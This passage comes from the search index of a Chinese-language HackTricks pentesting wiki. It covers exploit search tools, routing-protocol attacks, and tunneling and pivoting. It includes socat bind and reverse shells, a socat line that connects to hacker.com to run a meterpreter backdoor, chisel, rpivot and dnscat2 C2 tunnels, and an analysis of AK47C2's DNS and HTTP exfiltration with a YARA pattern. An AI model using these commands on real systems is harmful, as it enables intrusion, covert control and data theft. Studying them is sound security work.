Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Search Exploits » 搜索漏洞","id":"1266","title":"搜索漏洞"},"1267":{"body":"始终在“google”或其他地方搜索: [version] exploit 您还应该尝试 shodan 漏洞搜索 从 https://exploits.shodan.io/ 。","breadcrumbs":"Search Exploits » 浏览器","id":"1267","title":"浏览器"},"1268":{"body":"用于从 exploitdb 控制台搜索服务漏洞。 bash #Searchsploit tricks\\nsearchsploit \\"linux Kernel\\" #Example\\nsearchsploit apache mod_ssl #Other example\\nsearchsploit -m 7618 #Paste the exploit in current directory\\nsearchsploit -p 7618[.c] #Show complete path\\nsearchsploit -x 7618[.c] #Open vi to inspect the exploit\\nsearchsploit --nmap file.xml #Search vulns inside an nmap xml result","breadcrumbs":"Search Exploits » Searchsploit","id":"1268","title":"Searchsploit"},"1269":{"body":"https://github.com/rfunix/Pompem 是另一个搜索漏洞的工具","breadcrumbs":"Search Exploits » Pompem","id":"1269","title":"Pompem"},"127":{"body":"已知存在三种版本的 Routing Information Protocol (RIP):RIP、RIPv2 和 RIPng。RIP 和 RIPv2 通过 UDP 的端口 520 向对等体发送 datagram,而 RIPng 则通过 IPv6 multicast 将 datagram 广播到 UDP 端口 521。RIPv2 引入了对 MD5 认证的支持。另一方面,RIPng 不包含原生认证;它依赖于 IPv6 中可选的 IPsec AH 和 ESP 头。 RIP 和 RIPv2: 通信通过 UDP datagram 的端口 520 进行。 RIPng: 使用 UDP 端口 521,通过 IPv6 multicast 广播 datagram。 注意 RIPv2 支持 MD5 认证,而 RIPng 不包含原生认证,依赖于 IPv6 中的 IPsec AH 和 ESP 头。","breadcrumbs":"Pentesting Network » RIP","id":"127","title":"RIP"},"1270":{"body":"bash msf> search platform:windows port:135 target:XP type:exploit","breadcrumbs":"Search Exploits » MSF-Search","id":"1270","title":"MSF-Search"},"1271":{"body":"如果没有找到任何内容,请尝试在 https://packetstormsecurity.com/ 中搜索使用的技术。","breadcrumbs":"Search Exploits » PacketStorm","id":"1271","title":"PacketStorm"},"1272":{"body":"您还可以在 vulners 数据库中搜索: https://vulners.com/","breadcrumbs":"Search Exploits » Vulners","id":"1272","title":"Vulners"},"1273":{"body":"此工具在其他数据库中搜索漏洞: https://sploitus.com/","breadcrumbs":"Search Exploits » Sploitus","id":"1273","title":"Sploitus"},"1274":{"body":"类似于 GTFOBins 的策划漏洞列表,按漏洞类型(本地权限提升、远程代码执行等)、服务类型(Web、SMB、SSH、RDP 等)、操作系统和实践实验室(链接到可以玩漏洞的机器)进行过滤: https://sploitify.haxx.it","breadcrumbs":"Search Exploits » Sploitify","id":"1274","title":"Sploitify"},"1275":{"body":"search_vulns 使您能够搜索已知的漏洞和漏洞利用: https://search-vulns.com/ 。它利用了各种数据源,如 NVD、Exploit-DB、GitHub 中的 PoC、GitHub 安全咨询数据库和 endoflife.date。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Search Exploits » search_vulns","id":"1275","title":"search_vulns"},"1276":{"body":"Reading time: 30 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Tunneling and Port Forwarding » Tunneling and Port Forwarding","id":"1276","title":"Tunneling and Port Forwarding"},"1277":{"body":"warning ICMP 和 SYN 扫描无法通过 socks 代理进行隧道传输,因此我们必须 禁用 ping 发现 (-Pn) 并指定 TCP 扫描 (-sT) 以使其工作。","breadcrumbs":"Tunneling and Port Forwarding » Nmap tip","id":"1277","title":"Nmap tip"},"1278":{"body":"Host -> Jump -> InternalA -> InternalB bash # On the jump server connect the port 3333 to the 5985\\nmknod backpipe p;\\nnc -lvnp 5985 0backpipe # On InternalA accessible from Jump and can access InternalB\\n## Expose port 3333 and connect it to the winrm port of InternalB\\nexec 3<>/dev/tcp/internalB/5985\\nexec 4<>/dev/tcp/Jump/3333\\ncat <&3 >&4 &\\ncat <&4 >&3 & # From the host, you can now access InternalB from the Jump server\\nevil-winrm -u username -i Jump","breadcrumbs":"Tunneling and Port Forwarding » Bash","id":"1278","title":"Bash"},"1279":{"body":"SSH 图形连接 (X) bash ssh -Y -C @ #-Y is less secure but faster than -X","breadcrumbs":"Tunneling and Port Forwarding » SSH","id":"1279","title":"SSH"},"128":{"body":"EIGRP (Enhanced Interior Gateway Routing Protocol) 是一种动态路由协议。 它是一个距离向量协议。 如果没有 认证 并且没有将接口配置为被动, 入侵者 可以干扰 EIGRP 路由并导致 路由表被投毒 。此外,EIGRP 网络(即自治系统) 是扁平的,没有任何分区划分 。如果 攻击者注入一条路由 ,这条路由很可能会 在整个自治 EIGRP 系统中传播 。 要攻击 EIGRP 系统,需要 与合法的 EIGRP 路由器建立邻居关系 ,这会打开许多可能性,从基础侦察到各种注入。 FRRouting 允许你实现一个支持 BGP、OSPF、EIGRP、RIP 等协议的 虚拟路由器 。你只需将其部署在攻击者的系统上,就可以在路由域中伪装成合法的路由器。 EIGRP Attacks Coly 具备拦截 EIGRP (Enhanced Interior Gateway Routing Protocol) 广播的能力。它还允许注入数据包,可用于修改路由配置。","breadcrumbs":"Pentesting Network » EIGRP Attacks","id":"128","title":"EIGRP Attacks"},"1280":{"body":"在SSH服务器中打开新端口 --> 其他端口 bash ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere bash ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere","breadcrumbs":"Tunneling and Port Forwarding » Local Port2Port","id":"1280","title":"Local Port2Port"},"1281":{"body":"本地端口 --> 被攻陷的主机 (SSH) --> 第三方主机:端口 bash ssh -i ssh_key @ -L :: [-p ] [-N -f] #This way the terminal is still in your host\\n#Example\\nsudo ssh -L 631::631 -N -f -l ","breadcrumbs":"Tunneling and Port Forwarding » Port2Port","id":"1281","title":"Port2Port"},"1282":{"body":"本地端口 --> 被攻陷的主机 (SSH) --> 任何地方 bash ssh -f -N -D @ #All sent to local port will exit through the compromised server (use as proxy)","breadcrumbs":"Tunneling and Port Forwarding » Port2hostnet (proxychains)","id":"1282","title":"Port2hostnet (proxychains)"},"1283":{"body":"这对于通过 DMZ 从内部主机获取反向 shell 到您的主机非常有用: bash ssh -i dmz_key -R :443:0.0.0.0:7000 root@10.129.203.111 -vN\\n# Now you can send a rev to dmz_internal_ip:443 and capture it in localhost:7000\\n# Note that port 443 must be open\\n# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems\\n# and change the line \\"GatewayPorts no\\" to \\"GatewayPorts yes\\"\\n# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)","breadcrumbs":"Tunneling and Port Forwarding » 反向端口转发","id":"1283","title":"反向端口转发"},"1284":{"body":"您需要 在两个设备上具有root权限 (因为您将创建新的接口),并且sshd配置必须允许root登录: PermitRootLogin yes PermitTunnel yes bash ssh root@server -w any:any #This will create Tun interfaces in both devices\\nip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0 #Client side VPN IP\\nifconfig tun0 up #Activate the client side network interface\\nip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0 #Server side VPN IP\\nifconfig tun0 up #Activate the server side network interface 在服务器端启用转发 bash echo 1 > /proc/sys/net/ipv4/ip_forward\\niptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE 在客户端设置新路由 route add -net 10.0.0.0/16 gw 1.1.1.1 note 安全 – Terrapin 攻击 (CVE-2023-48795) 2023年的Terrapin降级攻击可以让中间人篡改早期的SSH握手并将数据注入到 任何转发通道 (-L,-R,-D)。确保客户端和服务器都已打补丁( OpenSSH ≥ 9.6/LibreSSH 6.7 ),或者在依赖SSH隧道之前明确禁用易受攻击的chacha20-poly1305@openssh.com和*-etm@openssh.com算法,在sshd_config/ssh_config中进行设置。","breadcrumbs":"Tunneling and Port Forwarding » VPN-Tunnel","id":"1284","title":"VPN-Tunnel"},"1285":{"body":"您可以通过 ssh 将所有 流量 隧道到 子网络 通过一个主机。 例如,转发所有流量到10.10.10.0/24 bash pip install sshuttle\\nsshuttle -r user@host 10.10.10.10/24 使用私钥连接 bash sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd \'ssh -i ./id_rsa\'\\n# -D : Daemon mode","breadcrumbs":"Tunneling and Port Forwarding » SSHUTTLE","id":"1285","title":"SSHUTTLE"},"1286":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » Meterpreter","id":"1286","title":"Meterpreter"},"1287":{"body":"本地端口 --> 被攻陷的主机(活动会话) --> 第三方主机:端口 bash # Inside a meterpreter session\\nportfwd add -l -p -r ","breadcrumbs":"Tunneling and Port Forwarding » Port2Port","id":"1287","title":"Port2Port"},"1288":{"body":"bash background# meterpreter session\\nroute add # (ex: route add 10.10.10.14 255.255.255.0 8)\\nuse auxiliary/server/socks_proxy\\nrun #Proxy port 1080 by default\\necho \\"socks4 127.0.0.1 1080\\" > /etc/proxychains.conf #Proxychains 另一种方法: bash background #meterpreter session\\nuse post/multi/manage/autoroute\\nset SESSION \\nset SUBNET #Ex: set SUBNET 10.1.13.0\\nset NETMASK \\nrun\\nuse auxiliary/server/socks_proxy\\nset VERSION 4a\\nrun #Proxy port 1080 by default\\necho \\"socks4 127.0.0.1 1080\\" > /etc/proxychains.conf #Proxychains","breadcrumbs":"Tunneling and Port Forwarding » SOCKS","id":"1288","title":"SOCKS"},"1289":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » Cobalt Strike","id":"1289","title":"Cobalt Strike"},"129":{"body":"在 Open Shortest Path First (OSPF) 协议中, MD5 认证通常用于确保路由器之间的安全通信 。然而,这种安全措施可以被 Loki 和 John the Ripper 等工具破坏。这些工具能够捕获并破解 MD5 哈希,从而暴露认证密钥。一旦获取该密钥,就可以用它引入新的路由信息。用于配置路由参数和设置被破解密钥的分别是 Injection 和 Connection 选项卡。 捕获并破解 MD5 哈希: 可以使用 Loki 和 John the Ripper 等工具。 配置路由参数: 通过 Injection 选项卡完成。 设置被破解的密钥: 在 Connection 选项卡中配置。","breadcrumbs":"Pentesting Network » OSPF","id":"129","title":"OSPF"},"1290":{"body":"在 teamserver 中打开一个端口,监听所有接口,以便 通过 beacon 路由流量 。 bash beacon> socks 1080\\n[+] started SOCKS4a server on: 1080 # Set port 1080 as proxy server in proxychains.conf\\nproxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25","breadcrumbs":"Tunneling and Port Forwarding » SOCKS 代理","id":"1290","title":"SOCKS 代理"},"1291":{"body":"warning 在这种情况下, 端口在信标主机上打开 ,而不是在团队服务器上,流量被发送到团队服务器,然后从那里发送到指定的主机:端口 bash rportfwd [bind port] [forward host] [forward port]\\nrportfwd stop [bind port] 需要注意: Beacon 的反向端口转发旨在 将流量隧道传输到 Team Server,而不是在单个机器之间中继 。 流量在 Beacon 的 C2 流量中隧道传输 ,包括 P2P 链接。 不需要管理员权限 来在高端口上创建反向端口转发。","breadcrumbs":"Tunneling and Port Forwarding » rPort2Port","id":"1291","title":"rPort2Port"},"1292":{"body":"warning 在这种情况下, 端口在 beacon 主机上打开 ,而不是在 Team Server 上, 流量发送到 Cobalt Strike 客户端 (而不是 Team Server),然后从那里发送到指定的主机:端口。 bash rportfwd_local [bind port] [forward host] [forward port]\\nrportfwd_local stop [bind port]","breadcrumbs":"Tunneling and Port Forwarding » rPort2Port 本地","id":"1292","title":"rPort2Port 本地"},"1293":{"body":"https://github.com/sensepost/reGeorg 您需要上传一个网络文件隧道:ashx|aspx|js|jsp|php|php|jsp bash python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp","breadcrumbs":"Tunneling and Port Forwarding » reGeorg","id":"1293","title":"reGeorg"},"1294":{"body":"您可以从 https://github.com/jpillora/chisel 的发布页面下载它。 您需要为客户端和服务器使用 相同的版本 。","breadcrumbs":"Tunneling and Port Forwarding » Chisel","id":"1294","title":"Chisel"},"1295":{"body":"bash ./chisel server -p 8080 --reverse #Server -- Attacker\\n./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim\\n#And now you can use proxychains with port 1080 (default) ./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)\\n./chisel client -v 10.10.10.10:8080 socks #Attacker","breadcrumbs":"Tunneling and Port Forwarding » socks","id":"1295","title":"socks"},"1296":{"body":"bash ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker\\n./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim","breadcrumbs":"Tunneling and Port Forwarding » 端口转发","id":"1296","title":"端口转发"},"1297":{"body":"https://github.com/nicocha30/ligolo-ng 代理和代理使用相同版本","breadcrumbs":"Tunneling and Port Forwarding » Ligolo-ng","id":"1297","title":"Ligolo-ng"},"1298":{"body":"bash # Start proxy server and automatically generate self-signed TLS certificates -- Attacker\\nsudo ./proxy -selfcert\\n# Create an interface named \\"ligolo\\" -- Attacker\\ninterface_create --name \\"ligolo\\"\\n# Print the currently used certificate fingerprint -- Attacker\\ncertificate_fingerprint\\n# Start the agent with certification validation -- Victim\\n./agent -connect :11601 -v -accept-fingerprint \\n# Select the agent -- Attacker\\nsession\\n1\\n# Start the tunnel on the proxy server -- Attacker\\ntunnel_start --tun \\"ligolo\\"\\n# Display the agent\'s network configuration -- Attacker\\nifconfig\\n# Create a route to the agent\'s specified network -- Attacker\\ninterface_add_route --name \\"ligolo\\" --route /\\n# Display the tun interfaces -- Attacker\\ninterface_list","breadcrumbs":"Tunneling and Port Forwarding » 隧道技术","id":"1298","title":"隧道技术"},"1299":{"body":"bash # Establish a tunnel from the proxy server to the agent\\n# Create a TCP listening socket on the agent (0.0.0.0) on port 30000 and forward incoming TCP connections to the proxy (127.0.0.1) on port 10000 -- Attacker\\nlistener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp\\n# Display the currently running listeners on the agent -- Attacker\\nlistener_list","breadcrumbs":"Tunneling and Port Forwarding » 代理绑定和监听","id":"1299","title":"代理绑定和监听"},"13":{"body":"为现场而建。围绕您而建。 Cyber Helmets 开发并提供有效的网络安全培训,由行业专家主导。 他们的课程超越理论,装备团队深入理解和可操作的技能,使用反映现实世界威胁的自定义环境。有关定制培训的咨询,请通过 这里 联系我们。 他们的培训与众不同之处: 定制内容和实验室 由顶级工具和平台支持 由从业者设计和教授 Courses - Cyber Helmets","breadcrumbs":"HackTricks » CyberHelmets","id":"13","title":"CyberHelmets"},"130":{"body":"Above :用于扫描网络流量并查找漏洞的工具 你可以在 这里 找到有关网络攻击的 更多信息 。","breadcrumbs":"Pentesting Network » Other Generic Tools & Sources","id":"130","title":"Other Generic Tools & Sources"},"1300":{"body":"bash # Establish a tunnel from the proxy server to the agent\\n# Create a route to redirect traffic for 240.0.0.1 to the Ligolo-ng interface to access the agent\'s local services -- Attacker\\ninterface_add_route --name \\"ligolo\\" --route 240.0.0.1/32","breadcrumbs":"Tunneling and Port Forwarding » 访问代理的本地端口","id":"1300","title":"访问代理的本地端口"},"1301":{"body":"https://github.com/klsecservices/rpivot 反向隧道。隧道从受害者开始。 在 127.0.0.1:1080 上创建一个 socks4 代理。 bash attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080 bash victim> python client.py --server-ip --server-port 9999 通过 NTLM 代理 进行枢轴 bash victim> python client.py --server-ip --server-port 9999 --ntlm-proxy-ip --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd bash victim> python client.py --server-ip --server-port 9999 --ntlm-proxy-ip --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45","breadcrumbs":"Tunneling and Port Forwarding » Rpivot","id":"1301","title":"Rpivot"},"1302":{"body":"https://github.com/andrew-d/static-binaries","breadcrumbs":"Tunneling and Port Forwarding » Socat","id":"1302","title":"Socat"},"1303":{"body":"bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane\\nattacker> socat FILE:`tty`,raw,echo=0 TCP4::1337","breadcrumbs":"Tunneling and Port Forwarding » 绑定 shell","id":"1303","title":"绑定 shell"},"1304":{"body":"bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0\\nvictim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane","breadcrumbs":"Tunneling and Port Forwarding » 反向 shell","id":"1304","title":"反向 shell"},"1305":{"body":"bash socat TCP4-LISTEN:,fork TCP4:: &","breadcrumbs":"Tunneling and Port Forwarding » Port2Port","id":"1305","title":"Port2Port"},"1306":{"body":"bash socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678","breadcrumbs":"Tunneling and Port Forwarding » 通过socks的Port2Port","id":"1306","title":"通过socks的Port2Port"},"1307":{"body":"bash #Create meterpreter backdoor to port 3333 and start msfconsole listener in that port\\nattacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333 bash victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5\\n#Execute the meterpreter 您可以通过在受害者的控制台中执行这一行来绕过 非认证代理 ,而不是最后一行: bash OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacker.com:443,connect-timeout=5|TCP:proxy.lan:8080,connect-timeout=5 https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/","breadcrumbs":"Tunneling and Port Forwarding » 通过 SSL Socat 的 Meterpreter","id":"1307","title":"通过 SSL Socat 的 Meterpreter"},"1308":{"body":"/bin/sh console 在客户端和服务器两侧创建证书: bash # Execute these commands on both sides\\nFILENAME=socatssl\\nopenssl genrsa -out $FILENAME.key 1024\\nopenssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt\\ncat $FILENAME.key $FILENAME.crt >$FILENAME.pem\\nchmod 600 $FILENAME.key $FILENAME.pem bash attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=client.crt EXEC:/bin/sh\\nvictim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt","breadcrumbs":"Tunneling and Port Forwarding » SSL Socat Tunnel","id":"1308","title":"SSL Socat Tunnel"},"1309":{"body":"将本地 SSH 端口 (22) 连接到攻击者主机的 443 端口 bash attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost\\nvictim> while true; do socat TCP4::443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22\\nattacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim","breadcrumbs":"Tunneling and Port Forwarding » Remote Port2Port","id":"1309","title":"Remote Port2Port"},"131":{"body":"攻击者通过发送伪造的 DHCP 响应,为网络中新加入的主机配置所有网络参数(GW、IP、DNS)。 bash Ettercap\\nyersinia dhcp -attack 2 #More parameters are needed","breadcrumbs":"Pentesting Network » Spoofing","id":"131","title":"Spoofing"},"1310":{"body":"它就像一个控制台版本的 PuTTY(选项与 ssh 客户端非常相似)。 由于这个二进制文件将在受害者的机器上执行,并且它是一个 ssh 客户端,我们需要打开我们的 ssh 服务和端口,以便能够建立反向连接。然后,要将仅本地可访问的端口转发到我们机器上的一个端口: bash echo y | plink.exe -l -pw [-p ] -R :: \\necho y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090","breadcrumbs":"Tunneling and Port Forwarding » Plink.exe","id":"1310","title":"Plink.exe"},"1311":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » Windows netsh","id":"1311","title":"Windows netsh"},"1312":{"body":"您需要是本地管理员(对于任何端口) bash netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp\\n# Example:\\nnetsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444\\n# Check the port forward was created:\\nnetsh interface portproxy show v4tov4\\n# Delete port forward\\nnetsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444","breadcrumbs":"Tunneling and Port Forwarding » Port2Port","id":"1312","title":"Port2Port"},"1313":{"body":"您需要拥有 系统的RDP访问权限 。 下载: SocksOverRDP x64 Binaries - 此工具使用Windows的远程桌面服务功能中的Dynamic Virtual Channels(DVC)。DVC负责 在RDP连接上隧道数据包 。 Proxifier Portable Binary 在您的客户端计算机上加载**SocksOverRDP-Plugin.dll**,如下所示: bash # Load SocksOverRDP.dll using regsvr32.exe\\nC:\\\\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll 现在我们可以通过 RDP 使用 mstsc.exe 连接到 victim ,我们应该收到一个 prompt ,提示 SocksOverRDP 插件已启用 ,并且它将 listen 在 127.0.0.1:1080 。 通过 RDP 连接,并在受害者机器上上传并执行 SocksOverRDP-Server.exe 二进制文件: C:\\\\SocksOverRDP-x64> SocksOverRDP-Server.exe 现在,在你的机器(攻击者)上确认端口 1080 正在监听: netstat -antb | findstr 1080 现在您可以使用 Proxifier 通过该端口代理流量。","breadcrumbs":"Tunneling and Port Forwarding » SocksOverRDP & Proxifier","id":"1313","title":"SocksOverRDP & Proxifier"},"1314":{"body":"您可以使用 Proxifier 使 Windows GUI 应用程序通过代理导航。 在 Profile -> Proxy Servers 中添加 SOCKS 服务器的 IP 和端口。 在 Profile -> Proxification Rules 中添加要代理的程序名称和要代理的 IP 连接。","breadcrumbs":"Tunneling and Port Forwarding » 代理 Windows GUI 应用程序","id":"1314","title":"代理 Windows GUI 应用程序"},"1315":{"body":"之前提到的工具: Rpivot OpenVPN 也可以绕过它,在配置文件中设置这些选项: bash http-proxy 8080 ntlm","breadcrumbs":"Tunneling and Port Forwarding » NTLM 代理绕过","id":"1315","title":"NTLM 代理绕过"},"1316":{"body":"http://cntlm.sourceforge.net/ 它对代理进行身份验证,并在本地绑定一个端口,该端口转发到您指定的外部服务。然后,您可以通过此端口使用您选择的工具。 例如,转发端口 443 Username Alice\\nPassword P@ssw0rd\\nDomain CONTOSO.COM\\nProxy 10.0.0.10:8080\\nTunnel 2222::443 现在,如果你在受害者的 SSH 服务上设置监听端口为443。你可以通过攻击者的2222端口连接到它。 你也可以使用连接到localhost:443的 meterpreter ,而攻击者在2222端口监听。","breadcrumbs":"Tunneling and Port Forwarding » Cntlm","id":"1316","title":"Cntlm"},"1317":{"body":"由微软创建的反向代理。你可以在这里找到它: https://github.com/microsoft/reverse-proxy","breadcrumbs":"Tunneling and Port Forwarding » YARP","id":"1317","title":"YARP"},"1318":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » DNS Tunneling","id":"1318","title":"DNS Tunneling"},"1319":{"body":"https://code.kryo.se/iodine/ 在两个系统中都需要root权限,以创建tun适配器并通过DNS查询在它们之间隧道数据。 attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com\\nvictim> iodine -f -P P@ssw0rd tunneldomain.com -r\\n#You can see the victim at 1.1.1.2 隧道将非常慢。您可以通过使用以下命令在此隧道中创建一个压缩的SSH连接: ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080","breadcrumbs":"Tunneling and Port Forwarding » Iodine","id":"1319","title":"Iodine"},"132":{"body":"参见 上一节 。","breadcrumbs":"Pentesting Network » ARP Spoofing","id":"132","title":"ARP Spoofing"},"1320":{"body":"从这里下载 . 通过DNS建立C&C通道。它不需要root权限。 bash attacker> ruby ./dnscat2.rb tunneldomain.com\\nvictim> ./dnscat2 tunneldomain.com # If using it in an internal network for a CTF:\\nattacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache\\nvictim> ./dnscat2 --dns host=10.10.10.10,port=5353 在 PowerShell 中 您可以使用 dnscat2-powershell 在 PowerShell 中运行 dnscat2 客户端: Import-Module .\\\\dnscat2.ps1\\nStart-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd 使用 dnscat 进行端口转发 bash session -i \\nlisten [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host 更改 proxychains DNS Proxychains 拦截 gethostbyname libc 调用,并通过 socks 代理隧道 tcp DNS 请求。默认情况下,proxychains 使用的 DNS 服务器是 4.2.2.2 (硬编码)。要更改它,请编辑文件: /usr/lib/proxychains3/proxyresolv 并更改 IP。如果您在 Windows 环境 中,可以设置 域控制器 的 IP。","breadcrumbs":"Tunneling and Port Forwarding » DNSCat2","id":"1320","title":"DNSCat2"},"1321":{"body":"https://github.com/hotnops/gtunnel","breadcrumbs":"Tunneling and Port Forwarding » Go 中的隧道","id":"1321","title":"Go 中的隧道"},"1322":{"body":"Storm-2603 行动者创建了一个 双通道 C2 (\\"AK47C2\\") ,仅利用出站 DNS 和 普通 HTTP POST 流量——这两种协议在企业网络中很少被阻止。 DNS 模式 (AK47DNS) • 生成一个随机的 5 字符 SessionID(例如 H4T14)。 • 为 任务请求 前缀 1,为 结果 前缀 2,并连接不同字段(标志、SessionID、计算机名称)。 • 每个字段都用 ASCII 密钥 VHBD@H XOR 加密 ,十六进制编码,并用点连接在一起——最终以攻击者控制的域名结束: text <1|2>.a..update.updatemicfosoft.com • 请求使用 DnsQuery() 获取 TXT (并回退到 MG )记录。 • 当响应超过 0xFF 字节时,后门 将数据分片 为 63 字节,并插入标记: stp 以便 C2 服务器可以重新排序它们。 HTTP 模式 (AK47HTTP) • 构建一个 JSON 信封: json {\\"cmd\\":\\"\\",\\"cmd_id\\":\\"\\",\\"fqdn\\":\\"\\",\\"result\\":\\"\\",\\"type\\":\\"task\\"} • 整个数据块进行 XOR-VHBD@H → 十六进制 → 作为 POST / 的主体发送,头部为 Content-Type: text/plain。 • 回复遵循相同的编码,cmd 字段通过 cmd.exe /c 2>&1 执行。 蓝队注意事项 • 寻找不寻常的 TXT 查询 ,其第一个标签是长十六进制,并且总是以一个稀有域名结束。 • 一个恒定的 XOR 密钥后跟 ASCII-十六进制很容易用 YARA 检测: 6?56484244?484(十六进制中的 VHBD@H)。 • 对于 HTTP,标记纯十六进制且字节数为偶数的 text/plain POST 主体。 {{#note}} 整个通道适合 标准 RFC 兼容查询 ,并保持每个子域标签在 63 字节以下,使其在大多数 DNS 日志中隐蔽。 {{#endnote}}","breadcrumbs":"Tunneling and Port Forwarding » 自定义 DNS TXT / HTTP JSON C2 (AK47C2)","id":"1322","title":"自定义 DNS TXT / HTTP JSON C2 (AK47C2)"},"1323":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » ICMP 隧道","id":"1323","title":"ICMP 隧道"},"1324":{"body":"https://github.com/friedrich/hans https://github.com/albertzak/hanstunnel 在两个系统中都需要 root 权限,以创建 tun 适配器并使用 ICMP 回显请求在它们之间隧道数据。 bash ./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)\\n./hans -f -c -p P@ssw0rd -v\\nping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100","breadcrumbs":"Tunneling and Port Forwarding » Hans","id":"1324","title":"Hans"},"1325":{"body":"从这里下载 。 bash # Generate it\\nsudo ./autogen.sh # Server -- victim (needs to be able to receive ICMP)\\nsudo ptunnel-ng\\n# Client - Attacker\\nsudo ptunnel-ng -p -l -r -R \\n# Try to connect with SSH through ICMP tunnel\\nssh -p 2222 -l user 127.0.0.1\\n# Create a socks proxy through the SSH connection through the ICMP tunnel\\nssh -D 9050 -p 2222 -l user 127.0.0.1","breadcrumbs":"Tunneling and Port Forwarding » ptunnel-ng","id":"1325","title":"ptunnel-ng"},"1326":{"body":"ngrok 是一个可以通过一条命令行将解决方案暴露到互联网的工具。 暴露的 URI 类似于: UID.ngrok.io","breadcrumbs":"Tunneling and Port Forwarding » ngrok","id":"1326","title":"ngrok"},"1327":{"body":"创建一个账户: https://ngrok.com/signup 客户端下载: bash tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin\\nchmod a+x ./ngrok\\n# Init configuration, with your token\\n./ngrok config edit","breadcrumbs":"Tunneling and Port Forwarding » 安装","id":"1327","title":"安装"},"1328":{"body":"文档: https://ngrok.com/docs/getting-started/ . 如果需要,也可以添加身份验证和TLS。 隧道 TCP bash # Pointing to 0.0.0.0:4444\\n./ngrok tcp 4444\\n# Example of resulting link: 